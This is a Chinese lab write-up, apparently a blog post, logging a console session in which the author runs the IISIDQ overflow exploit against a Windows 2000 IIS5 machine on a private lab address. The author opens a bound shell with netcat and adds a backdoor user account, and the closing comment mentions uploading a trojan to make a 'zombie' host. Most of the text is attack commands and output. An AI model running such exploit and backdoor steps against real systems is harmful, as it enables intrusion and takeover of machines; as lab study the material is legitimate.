实验:win2000 iisidq漏洞***

Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator>d:

D:\>cd iisidq

D:\IISidq>dir
 驱动器 D 中的卷没有标签。
 卷的序列号是 C461-74A9

 D:\IISidq 的目录

2011-05-03  08:46    <DIR>          .
2011-05-03  08:46    <DIR>          ..
2001-07-24  13:34            16,384 IISIDQOverflowV2_Build0013.exe
2001-07-24  13:34            24,576 IISMiscOverflowV2_Build0013.exe
2001-07-24  13:37             1,281 ReadmeNow.txt
2001-09-23  09:56               506 ReadmNow.txt
               4 个文件         42,747 字节
               2 个目录  8,274,116,608 可用字节

D:\IISidq>iisidq 0 192.168.191.128 80 1 521
'iisidq' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

D:\IISidq>iisidqoverflowv2_build0013.exe
运行参数:  操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>
    或者:  操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>

  其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe /c + dir"
  如果为1,那么,将输入新的命令.

支持的操作系统 类型: ----
         0 -- IIS5中文Win2k Sp0
         1 -- IIS5中文Win2k Sp1
         2 -- IIS5中文Win2k Sp2
         3 -- IIS5 English Win2k Sp0
         4 -- IIS5 English Win2k Sp1
         5 -- --IIS5 English Win2k Sp2
         6 -- IIS5 Japanese Win2k Sp0
         7 -- IIS5 Japanese Win2k Sp1
         8 -- --IIS5 Japanese Win2k Sp2
         9 -- IIS5 Mexico Win2k
         10 -- --IIS5 Mexico Win2k sp1
         11 -- --IIS5 Mexico Win2k sp2

  IIS5 IDQ Overflow.v2.0 Build 0013 by snake.
              http://snake12.top263.net 2000/07

D:\IISidq>iisidq 0 192.168.191.128 80 1 521
'iisidq' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168.191.128 80 1 521
连接目的机器 192.168.191.128:80 OK.
发送shellcode 到 192.168.191.128:80 OK
 现在，如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [cmd.exe /c dir c:\] 结
果了...,good luck.!
D:\IISidq>cd..

D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
 驱动器 C 中的卷没有标签。
 卷的序列号是 64FE-4AEE

 c:\ 的目录

2010-09-14  10:35       <DIR>          Documents and Settings
2010-09-14  10:29       <DIR>          Inetpub
2011-05-03  08:29       <DIR>          Program Files
2011-05-03  08:33       <DIR>          web
2011-05-03  08:42       <DIR>          WINDOWS
               0 个文件              0 字节
               5 个目录  6,867,349,504 可用字节

D:\>dir
 驱动器 D 中的卷没有标签。
 卷的序列号是 C461-74A9

 D:\ 的目录

2011-04-09  00:27         1,107,800 8uftp.exe
2011-04-11  15:54             1,549 8uftp.xml
2011-04-14  16:23    <DIR>          backup
2011-04-15  08:46    <DIR>          data
2011-04-21  09:20    <DIR>          fakeTasks.{D6277990-4C6A-11CF-8D87-00AA0060F
5BF}
2011-05-03  08:46    <DIR>          IISidq
2011-04-21  08:37             1,120 maxiangrui.rar
1996-07-26  08:39            45,568 nc.exe
2011-04-14  16:46    <DIR>          Program Files
2011-04-14  16:45        34,235,768 QQ2010.exe
2011-04-21  09:20    <DIR>          set.{21EC2020-3AEA-1069-A2DD-08002B30309D}
2011-04-20  08:29    <DIR>          sql
2011-03-27  10:32    <DIR>          vfp
2011-03-30  09:39    <DIR>          wy
2011-04-14  16:24    <DIR>          _user
2009-12-31  00:00         7,981,995 客户端模拟练习版.exe
2011-04-12  08:21    <DIR>          聊天冲浪
               6 个文件     43,373,800 字节
              11 个目录  8,274,067,456 可用字节

D:\>cd iidisq
系统找不到指定的路径。

D:\>iisidq
'iisidq' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

D:\>cd iisidq

D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168191.128 80 1 521 1

请输入绑定的命令:cmd.exe
连接目的机器 192.168191.128:80 失败.

D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168.191.128 80 1 521 1

请输入绑定的命令:cmd.exe
连接目的机器 192.168.191.128:80 OK.
发送shellcode 到 192.168.191.128:80 OK
 现在，如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [cmd.exe] 结果了...,good
 luck.!
D:\IISidq>nc -v 192.168.191.128 521
'nc' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

D:\IISidq>cd..

D:\>nc -v 192.168.191.128
 punt!: unknown socket error

D:\>nc -v 192.168.191.128
no port[s] to connect to

D:\>
D:\>cd..

D:\>
D:\>
D:\>
D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

C:\WINDOWS\system32>

C:\WINDOWS\system32>
C:\WINDOWS\system32>net user maxr maxr123 /add
net user maxr maxr123 /add
命令成功完成。

 

C:\WINDOWS\system32>cd..
cd..

C:\WINDOWS>cd..
cd..

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 64FE-4AEE

 C:\ 的目录

2010-09-14  10:35       <DIR>          Documents and Settings
2010-09-14  10:29       <DIR>          Inetpub
2011-05-03  08:29       <DIR>          Program Files
2011-05-03  08:33       <DIR>          web
2011-05-03  08:42       <DIR>          WINDOWS
               0 个文件              0 字节
               5 个目录  6,867,341,312 可用字节

C:\>cd web
cd web

后话：又看了一遍自己的实验过程，发现思路还是最重要的，最后获得了cmd .exe权限，基本上是什么都可以做了，开启tftp，上传***，一个肉鸡完成了，，，实验的结果不是最终目的，都是比较老的漏洞，现在的2000基本上退出市面了吧，最重要还是思路和方法。整个***过程的想法才是最宝贵的财富。